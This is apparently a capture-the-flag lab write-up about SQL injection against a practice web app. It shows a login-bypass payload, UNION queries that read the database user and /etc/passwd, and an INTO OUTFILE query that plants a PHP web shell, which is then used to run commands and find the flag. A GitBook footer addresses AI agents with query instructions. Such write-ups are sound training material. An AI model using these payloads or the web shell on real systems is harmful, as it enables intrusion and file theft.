> For the complete documentation index, see [llms.txt](https://ghostwirez.gitbook.io/whoami/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ghostwirez.gitbook.io/whoami/writeups/sql-injection-in-authentication-and-search-parameters-resulting-in-remote-code-execution.md).

# SQL Injection in Authentication and Search Parameters resulting in Remote Code Execution

## Description

The company `InlaneFreight` has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

## Objective

* SQL Injection

## Flag

* `528d6d9cedc2c7aab146ef226e918396` 

## Solution

While poking around the target web application hosted at `http://94.237.57.106:46185`, it has been noticed that there is something interesting on the login page.

The web application seemed vulnerable to SQL Injection. After some digging, `two exploitable` points:

* Authentication bypass
* Search feature

That gave full access to the backend database. Eventually leading to a **Remote Code Execution (RCE).**

<figure><img src="/files/xPrg9JJI8bxWRMgjTQay" alt=""><figcaption></figcaption></figure>

#### Authentication Bypass via Blind SQL Injection

Through investigation of the login page, it was determined that entering the following payload into the **username** field:

```sql
admin' or '1'='1'-- -
```

<figure><img src="/files/rdgmLZ9J97bIqqOpbknu" alt=""><figcaption></figcaption></figure>

The payload enabled to bypass authentication and access the dashboard, confirming a blind SQL injection vulnerability.

#### SQL Injection in the Search Parameter

Moving forward, attention was turned to the dashboard's search functionality. Submitting a single quote (`'`) in the **search** field triggered an SQL error message, confirming another injection point.

<figure><img src="/files/Jvb9uq5jfBTJ7hWyiEIL" alt=""><figcaption></figcaption></figure>

To test for data extraction, the following payload was used:

```sql
' UNION SELECT 1, user(), 3, 4, 5-- -
```

<figure><img src="/files/tVOpGPUzNxf3jGKdfclR" alt=""><figcaption></figcaption></figure>

This payload returned the database user, which was `root@localhost`, indicating high privileges including `SUPER` and `FILE`.

#### Reading Files with LOAD\_FILE

Leveraging the `FILE` privilege, the reading of the `/etc/passwd` were attempted using:

```sql
' UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3, 4, 5-- -
```

<figure><img src="/files/R1R1DzPDAoSju6tGZoc5" alt=""><figcaption></figcaption></figure>

The contents of the file were successfully displayed. Further checks confirmed that the `secure_file_priv` value was empty, indicating arbitrary file read and write operations were possible.

#### Writing a Web Shell and Achieving RCE

With the ability to write files to the server, a PHP web shell was used:

```sql
' UNION SELECT "", "<?php system($_REQUEST[cmd]); ?>", "", "", "" INTO OUTFILE '/var/www/html/dashboard/shell.php'-- -
```

Accessing the shell via:

```http
http://94.237.57.106:46185/dashboard/shell.php?cmd=id
```

<figure><img src="/files/OdG2X66R29exLqQxKCUn" alt=""><figcaption></figcaption></figure>

This confirms a successful Remote Code Execution by returning the output of the `id` command.

#### Navigating the Server

From there, further commands such as:

```http
http://94.237.57.106:46185/dashboard/shell.php?cmd=ls+/
```

<figure><img src="/files/AkqaO1bKm9YQtt1PGaQx" alt=""><figcaption></figcaption></figure>

Which allowed enumeration of the file system and deeper exploration of the compromised server, revealing the .txt file `flag_cae1dadcd174.txt`  with flag value of `528d6d9cedc2c7aab146ef226e918396` .

## Conclusion

This challenge demonstrated an SQL injection attack chain:

* **Blind SQL injection** for login bypass
* **Union-based SQL Injection** for data exfiltration and file access
* **Remote Code Execution** via web shell upload

Through careful enumeration and exploitation, the target web application has been escalated from SQL injection to full system compromise.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ghostwirez.gitbook.io/whoami/writeups/sql-injection-in-authentication-and-search-parameters-resulting-in-remote-code-execution.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.